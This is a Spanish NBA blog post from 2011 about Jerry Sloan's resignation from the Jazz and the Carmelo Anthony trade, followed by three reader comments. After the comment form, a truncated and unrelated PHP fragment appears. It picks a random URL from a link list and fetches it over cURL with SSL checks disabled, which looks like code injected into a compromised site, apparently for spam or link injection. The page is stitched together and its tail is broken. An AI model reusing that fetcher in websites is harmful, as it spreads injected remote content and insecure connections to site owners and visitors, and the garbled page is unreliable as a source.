Reflexiones sobre la bocina #2

22 de February de 2011 por MagicJohnson32

Si en el artículo inaugural celebrábamos la destitución de un técnico, hoy es obligatorio abrir y dedicar buena parte de esta entrada a la despedida de otro. Por supuesto, no podemos obviar el culebrón del invierno a pocas horas de su resolución, y comentaremos también un inquietante artículo que hemos leído en yahoo y el presunto interés de los Warriors por dos interiores con mucho en común.

jerry-sloan

"¡Mamá, mamá, Deron me ha dicho que no me ajunta!"

3… El Caso Sloan.

En nuestra existencia, todos nos servimos de ciertos elementos que nos enlazan con la realidad. Puede tratarse de personas, objetos o rutinas, la cuestión es que figuran invariablemente en nuestro día a día, aunque sólo sean como figurantes, escenario, contexto.

Jerry Sloan representaba ese papel en mi particular percepción de la NBA. Desde que tengo uso de memoria, Sloan siempre ha estado ahí, como el logo con la silueta de Jerry West, como el trébol de los Celtics, como los proyectos fallidos de los Clippers o como Kevin Willis (¿existía el baloncesto antes de Kevin Willis? ¿Qué fue primero, el huevo, la gallina o Kevin Willis?).

De esta lista se nos cayó Willis tras su retirada hace un par de años, y ahora se nos cae Sloan, quien el jueves 10 de febrero presentó la dimisión y puso fin a una trayectoria de más de dos décadas al mando de los Utah Jazz. Qué raro se nos hace ese banquillo sin la presencia de Sloan, perenne desde los días de Frank Hayden. Aunque si en su momento nos acostumbramos a llamar Wizards a los Bullets y a una liga sin los Sonics (qué recuerdos, Payton, Schrempf, McMillan o Kemp antes de convertirse en el muñeco de Michelin) apuesto a que también nos acostumbraremos a esto.

Las cifras, que extrañamente alcanzan a reflejar la realidad,  impresionan cuando hablan sobre Sloan: 1.221 victorias en 2.024 partidos (incluyendo un balance de 98-104 en Playoffs) a lo largo de sus 26 temporadas como head coach de los Bulls y, sobre todo, de los Jazz. Decía el otro día ESPN que cuando Sloan asumió el cargo en los Jazz, 40 jugadores de la NBA todavía no habían nacido, y que desde aquel mismo día 245 entrenadores han sido destituidos. Pero hay otra cifra que llama tanto o más la atención: Sloan se retira sin un solo anillo.

Desconocemos cuáles son, a ciencia cierta, las razones que han precipitado la marcha de Sloan, con lo cual todo lo que podemos hacer es especular. Pero voy a jugar a ser abogado del diablo con respecto a dos cuestiones. La primera: me sorprende la reacción casi unánime contra Deron Williams. ¿Por qué? ¿Porque Williams haya discutido en varias ocasiones con Jerry Sloan? Eso no es, bajo ningún concepto, un motivo verosímil para que un entrenador al que la franquicia ha mantenido durante 23 años en el cargo presente su dimisión. Además, estos asuntos siempre acaban tomando una deriva en forma de gratuitos debates generacionales, y de pronto te descubres a ti mismo cual abuelo cebolleta: “estos niñatos de hoy en día, que sólo saben hacer pasos de salida, no tienen respeto por nada ni por nadie”. No sé cómo se imaginará el lector la convivencia en los vestuarios de equipos ganadores como los Bulls de los 90 o los Lakers, Celtics o Pistons de los 80, pero a mí me cuesta pensar que gente como Isiah Thomas, Laimbeer, Rodman, Vinnie Johnson o Rick Mahorn no le levantasen la voz a Chuck Daly con cierta frecuencia.

La segunda cuestión que se ha insinuado o incluso dicho abiertamente es que el futuro de los Jazz queda comprometido con la marcha de Sloan. ¿De qué futuro hablamos? De otra temprana eliminación en los Playoffs, en el mejor de los casos. Porque los Jazz son un buen equipo, por supuesto, capaz de alcanzar las 50 victorias en temporada regular y de luchar por una segunda ronda de Playoffs. Pero ya no eran el equipo de Jerry Sloan sino el de Deron Williams. Desde hace cuatro temporadas los Jazz llegan hasta donde alcanza con el extraordinario talento de su base. Y mientras Deron no deja de crecer, Sloan se ha mantenido anclado en un estilo fundamentado en la defensa, el juego en estático y el pick and roll. Es decir, aquello que Stockton y Malone convirtieron en arte pero que no saca lo mejor de jugadores como Okur, Boozer, Kirilenko o Al Jefferson.

Esto no ha de entenderse como un ataque a Sloan, quien con toda justicia pasará a la historia como Hall-of-famer y uno de los mejores entrenadores que ha existido. Pero los tiempos cambian, los ciclos se acaban, y los Jazz necesitan iniciar un nuevo ciclo con Deron como piedra angular; un nuevo ciclo para el que Sloan no estaba preparado. Por eso, porque siempre ha sido un tipo honesto por encima de todo, Sloan ya no es el entrenador de los Jazz, y no por unas discusiones con su jugador estrella.

Para cerrar el tema, lanzo la pregunta: si tuvieseis que elegir, ¿con quién os quedaríais, con Sloan o con Deron Williams? Porque yo lo tengo clarísimo.

2… El tiempo de los remiendos.

Parece el título de la nueva serie de la sobremesa de TVE, pero no lo es. Hablamos de esos últimos días previos al trade deadline, fecha a partir de la cual no se pueden realizar traspasos. A estas alturas todos los equipos saben, más o menos, a qué pueden aspirar, y no son pocos los que se apresuran a buscar un arreglo de última hora, ya sea para fortalecer su plantilla o bien con la mirada puesta en un futuro más o menos cercano.

Estos días todos estamos pendientes de Carmelo Anthony. ¿Acabará en los Knicks o en los Nets? Ambas franquicias, que se presentan como los principales destinos potenciales para Melo, se enfrentan a un doble reto: convencer a los Nuggets para cerrar el traspaso y a Melo para firmar una extensión de contrato. Podemos discutir sobre cuál de los dos puede reunir el mejor pack de jugadores, y ahí puede incluso que la balanza se decante del lado de los Nets (o no).

avery

- "Carmelo, NY está en esa dirección"

Pero ahora, por un momento, pongámonos en la piel de Anthony: ¿qué posible razón hay para irse a jugar a New Jersey? ¿Por qué he de preferir a un equipo con Avery Johnson como entrenador y Brook ‘5.8 rpp’ Lopez de referente por encima de uno con Mike D’Antoni y Amare Stoudemire? Y sobre todo ¿en qué universo podría un pabellón llamado Prudential Center competir con el Madison Square Garden?

Así que apuesto por los Knicks como destino (aunque, dadas mis habilidades predictivas, es muy posible que mientras escribo esto Carmelo esté firmando con cualquiera de los 28 equipos restantes). El trío Billups-Anthony-Stoudemire es una base magnífica para empezar a pensar en algo grande, aunque todavía estén lejos de poder competir con los favoritos. Porque si consideramos que la plantilla de los Heat es extremadamente corta, qué diremos del equipo que le quedará a D’Antoni si finalmente marchan a Colorado Felton, Chandler, Gallinari y Mozgov, como apunta el último rumor. Eso sí, si el traspaso sirve para que Landry Fields tenga más minutos, bienvenido sea, porque vaya clase muestra ya el chaval.

1… El Retorno del Coleccionista de Cuatros.

Así quedaron los Knicks tras el paso del Huracán Isiah.

Un último detalle sobre el “Culebrón Melo”: escribía Wojnarowski este pasado fin de semana que Isiah Thomas ha tomado el mando en las negociaciones para llevar a Melo a los Knicks. Cuesta de creer, después del estado en el que Zeke dejó la franquicia y del asombroso trabajo que ha llevado a cabo Donnie Walsh para recuperar no ya el prestigio o la popularidad de los Knicks sino el mero respeto perdido ante aficionados y profesionales.

¿En serio va James Dolan a menoscabar de esta manera al hombre que ha devuelto la dignidad a la franquicia, y devolver el timón a uno de los tipos más incompetentes que ha conocido el baloncesto, el mismo que decidió que Jerome James valía 40 millones de dólares?

Si es cierto, no me extrañaría que fuese Kenyon Martin, y no Melo, quien acabe en los Knicks, que ya sabemos lo apetecibles que resultan para Isiah los PF medio inútiles y exageradamente sobrepagados.

0… En la Bahía de los ciegos, el cojo es el rey.

Los Warriors, nos cuentan las páginas especializadas en rumores, están considerando la posibilidad de hacerse este verano con los servicios de Greg Oden o Yao Ming. Ya puestos, creo que deberían añadir a su lista de objetivos a Sam Bowie, a Robert Prosinecki o al personaje de Samuel L. Jackson en “El Protegido”. Y visto el rendimiento de Biedrins, cualquiera de ellos estaría en condiciones de mejorarlo.

PD: A punto de publicar esto, Carmelo Anthony ya es jugador de los Knicks. Es lo que tiene hablar de temas de actualidad, que en un momento cambia todo. Aunque siempre podemos echar la culpa a la infografía…

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    El día que Deron Garantice los playoffs para Utah en un 95% de los años que permanezca en una franquicia pobre como Utah me quedaré con él. Mientras tanto la duda casi ofende.

    La cuestión es precisamente esa. Sloan se ha topado con un desgaste de más de 20 años y un jugador que le ha puesto en el brete de él o el técnico. Como tú mismo insinúas, era una batalla perdida y al borde de la jubilación, con la vida solucionada, tampoco tenía demasiado sentido que afrontarla. Eso es todo.

    Lo que no entiendo es eso de que no ha sacado lo mejor de jugadores como Okur, Boozer, Kirilenko o Al Jefferson. Boozer u Okur jamás han jugado como bajo sus órdenes. Kirilenko o AJ son claros ejemplos del “se dejaba llevar”. No he visto ningún entrenador del mundo que haya sacado tanto jugo de lo poco que ha tenido.

    Esa franquicia se hunde. El primero en abandonar el barco será Deron Williams y pasarán muchos años antes de que se acerque lejanamente a lo que hemos visto de ella.

      Citar

  2. M dice:
    #2

    Estoy de acuerdo con Deer, si se trata de un dilema, me quedo con Deron…en principio, como modo de reconstruir a partir de él. Pero parece que Deron está loco por irse y en su empeño habrá malherido a la franquicia previamente, antes de darle su golpe de gracia. Esto son suposiciones, obviamente. Pero no me parecen gratuitas.

      Citar

  3. Vader dice:
    #3

    Una pena lo de Utah… apuesto de Deron no renovará y volveran a pasar años antes de volver a ver a los Utah en la elite, hay muchos equipos en el Oeste con plantillas jovenes, con las ideas más claras y sin tantos conflictos…

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>